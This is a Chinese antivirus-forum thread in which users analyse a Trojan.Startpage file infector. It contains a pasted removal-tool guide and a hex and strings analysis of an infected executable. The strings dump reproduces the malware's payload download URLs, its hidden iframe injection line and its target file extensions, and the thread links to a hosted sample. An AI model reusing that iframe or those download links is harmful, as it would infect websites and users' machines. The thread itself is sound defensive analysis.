瑞星卡卡安全论坛

前几天机器被所有可执行文件被修改，20日更新病毒库无法识别，23日更新后，能够发现这个病毒ievip被瑞星命名为Trojan.Startpage.upf,引发的另外一个文件被命名为Trojan.dll.Vbs.agent.cll，被感染的所有可执行文件，只要运行就会感染全部已经修复的可执行文件，但目前23日更新紧紧能认识病毒本身，无法修复感染的exe文件，这就意味着所有的已安装程序或者安装程序等文件都要被删除，或者格式化硬盘，机器里还有专用程序，这样损失就大了。
俺想让大家帮忙，如何解决被感染的可执行文件
附图如下：运行感染的文件就可以看到原来的被隐藏的可执行文件。


附件: 8697352007423222528.jpg

发个样本过来咯

http://myiddevil.ys168.com/
0字节的是坏文件，文件名有空格的是被修改并隐藏的可执行文件
前后对比，文件大小明显不一样！

有没有人可以解决，我泱泱大国，这点小问题难倒英雄汉，我去撞墙死呀！病毒及感染文件和运行后恢复隐藏的文件已经放在
http://myiddevil.ys168.com/
瑞星已经可以识别到此病毒，但是感染文件无法修复，问问普天之下
还有没有大虾可以解决了。郁闷之中.....

wo 靠，真服气了........

不急。晚上回来看。

许多电脑用户会经常遇到自己的防毒软件报告发现 Trojan.Startpage 这种病毒但却无法清除和隔离它的情况， 或者是在清除后不久它又出现了，让人非常苦恼。这时该怎么办呢？

其实 Trojan.Startpage 是某些防毒软件对某一类木马的统称，它并不代表着固定的一个，而是一类，所以即使遇到同样名子的木马可能它们也并不相同。 费尔托斯特安全是一款可以清除木马和病毒的软件，并且有很强的清除能力，如果您有它的正式版可以在升级到最新病毒库后尝试用它扫描清除一下，但这里需要特别提醒一点： 由于这类木马新变种层出不穷，所以不能保证费尔托斯特安全能够识别出目前所有的或者您遇到的。 那么除此之外难道就没有其他办法了吗？有的，下面就介绍一个借助免费工具“费尔木马强力清除助手”(此工具已经集成到费尔托斯特安全新版本中了)来清除这种顽固性 Trojan.Startpage 木马的方法：
使用这个方法前必须要先知道这个木马的文件名是什么。防毒软件在发现木马后一般都会报告它的完整文件名，您需要先准确的记录下这个文件名。比如：如果防毒软件提示 C:\Windows\hello.dll 是 Trojan.Startpage，则记下 C:\Windows\hello.dll 这个名子。这里需要注意文件名一定要记准确，因为有许多木马会把自己的文件名故意伪装成和正常的文件名很接近，比如 svch0st.exe(木马)->svchost.exe(正常)、Expl0rer.exe(木马)->Explorer.exe(正常)、intrenat.exe / internet.exe(木马)->internat.exe(正常)等等。特别是数字0几乎和大写字母O一样，很容易让人看错，所以一定要注意区分它们，否则万一记错将有可能把正常的文件清除掉，那就麻烦了；
暂停防毒软件的实时监控，这一点很重要，否则在清除时可能会被阻止而无法成功。比如如果当初是你的诺顿发现了这个木马，那么请先暂停诺顿的实时监控或实时扫描；
下载费尔木马强力清除助手 http://dl.filseclab.com/down/powerrmv.zip；
释放 PowerRmv.zip 到一个目录，然后执行其中的 PowerRmv.exe 启动“费尔木马强力清除助手”。在“文件名”中输入要清除的木马文件名。比如如果您在第1步中记下的文件名是 C:\Windows\hello.dll，那么这时就输入它；
按“清除”。这时程序会询问你是否要举报此病毒到费尔安全实验室，建议点“是”表示同意。接着程序会继续提示是否确定要清除它，仍然选“是”；
之后，如果此木马被成功清除程序会提示成功；或者也可能提示此木马无法被立即删除需要重启电脑。无论是哪种情况请点击“确定”，这时如果您在前面同意了举报此木马那么程序会自动创建并打开一个“病毒举报”的电子邮件，其中会包含这个木马的样本文件，如果您看到了这个邮件请把它直接发送给 virus@filseclab.com 。如果您并没有看到这封邮件也没有关系，可以忽略。
最后，如果程序前面提示了重启电脑后才能清除那么请一定重启您的电脑，在电脑重启后这个木马应该就被清除掉了。

重要提示： 如果您按上面的方法操作之后，发现不久这个木马又出现了，并且还是同样的文件名，那么您可以用上面的方法再重复执行一次，不过这次操作时请选中程序中的“抑制文件再次生成”选项， 这样清除后一般木马就很难再复活了。这个功能是最新版“费尔木马强力清除助手”中提供的，如果您的没有这个选项，请从上面的地址中重新下载一次。
注意：
“费尔木马强力清除助手”有很强的文件删除能力，清除后的文件将无法再恢复，所以在清除前一定要确定文件名没有输入错误。
如果您按上面的方法操作后仍然不能成功清除掉木马，则可能是电脑中还存在着另外一个更主要的木马，在它被清除后会自动从另外一处恢复。这时您需要用防毒软件扫描出所有的这些木马，然后逐一或同时清除才行。

我比较了一下原始文件红心大战``msheart.exe为124k,隐藏文件红心大战.exe为1.5M,通过winhex比较,在offset126960处(也就是msheart.exe文件的结尾)加入了一部分代码```

offset126976后面文件段删除后```程序正常```似乎有个“WINDOWS _0N4107UDB 7981306”等信息出现```后面似乎都是些垃圾信息```有什么  “正在汇总&dmx.第&yf.月份中小企业价值量指标的数据,请稍候..."
***整理数据库,替换汇总标志”等````

fsg加的壳```
继续看``也就是1.6M的文件在原文件的基础上加头加尾
头为文件头到offset95743
正常文件为offset95744----offset222719，共124k
尾为222720到文件尾`````
无语```
有时间再反汇编分析一下了```

提取加的头
脱壳头后w32dasm反编译
串式参考
String Resource ID=65535: "Floating point overflow"
"  "
" AMPM"
"
"
""
"$$"
"*.asp"
"*.aspx"
"*.exe"
"*.htm"
"*.html"
"*.jsp"
"*.php"
".."
"
:"
":\"
":mm"
":mm:ss"
"\*.*"
"\:"
"\\"
"`V?"
"<iframe height=0 src=http://dhz.810810.org/vip"
"00"
"0x"
"11"
"1蓞襱-Rf;
t f;Jtf;Jtf;Jt兟脘兟兟兟壯"
"95744"
"A/P"
"AAA"
"AAAA"
"am"
"AM"
"AM/PM"
"AMPM "
"AMPM"
"Any"
"Array "
"ByRef "
"c:\ievip.exe          "
"c:\qwe34.exe          "
"c:\qwea.exe            "
"c:\qwetop.exe          "
"c:\qwevip.exe          "
"c:\xiami.exe"
"c:\xz.exe"
"CC"
"ddd"
"ee"
"eeee"
"Empty"
"Error"
"False"
"FPUMaskValue"
"FuckJP"
"GetDiskFreeSpaceExA"
"GetLongPathNameA"
"gg"
"ggg"
"hh"
"http://at2.810810.org/ievip.exe"
"http://at2.810810.org/qwe34.exe"
"http://at2.810810.org/qwea.exe"
"http://at2.810810.org/qwetop.exe"
"http://at2.810810.org/qwevip.exe"
"http://www.c1j8.co5/xz.exe"
"http://www.p544.c5/xiami.exe"
"IEFrame"
"iexplore.exe"
"kernel32.dll"
"m/d/yy"
"mmmm d, yyyy"
"MZ"
"nil"
"open"
"pm"
"PM"
"Software\Borland\Delphi\Locales"
"SOFTWARE\Borland\Delphi\RTL"
"Software\Borland\Locales"
"String"
"Strings"
"S嬟嬓ttJ€?r??學??怶?%"
"True"
"U嬱?@"
"U嬱3蒕QQQQS3繳h?d0d?岴?桷岴?"
"U嬱j"
"U嬱SV3龌
"
"U嬱兡?蓧M魤U鴫E?繳h?d0d?"
"U嬱兡鬝VW3蓧M魤U鴫E?繳hd0d?"
"U嬱兡鳶3缐E?繳hQ?d0d?亇"
"VarAdd"
"VarAnd"
"VarBoolFromStr"
"VarBstrFromBool"
"VarBstrFromCy"
"VarBstrFromDate"
"VarCmp"
"VarCyFromStr"
"VarDateFromStr"
"VarDiv"
"VarI4FromStr"
"VariantChangeTypeEx"
"VarIdiv"
"VarMod"
"VarMul"
"VarNeg"
"VarNot"
"VarOr"
"VarR4FromStr"
"VarR8FromStr"
"VarSub"
"VarXor"
"yy"
"yyyy"
"婦$鰼"
"鑷??"
"鴊"


看来http://dhz.810810.org/vip这个是下载源之一
"http://at2.810810.org/ievip.exe"
"http://at2.810810.org/qwe34.exe"
"http://at2.810810.org/qwea.exe"
"http://at2.810810.org/qwetop.exe"
"http://at2.810810.org/qwevip.exe"
"http://www.c1j8.co5/xz.exe"
"http://www.p544.c5/xiami.exe"

在硬盘上
c:\ievip.exe          "
"c:\qwe34.exe          "
"c:\qwea.exe            "
"c:\qwetop.exe          "
"c:\qwevip.exe          "
"c:\xiami.exe"
"c:\xz.exe"
不过刚刚开始时候应该从IE缓存中进入
被kaka助手拦截```

继续```下午不注意也中了``不过就是一个逻辑盘```修复郁闷
用winhex```有时间写个修复工具出来~~~
通过楼上分析可以看出在模仿烧香~~
感染
"*.asp"
"*.aspx"
"*.htm"
"*.html"
"*.jsp"
"*.php"
在这些文件后加入
"<iframe height=0 src=http://dhz.810810.org/vip>"
后面我是用far批量替换的~~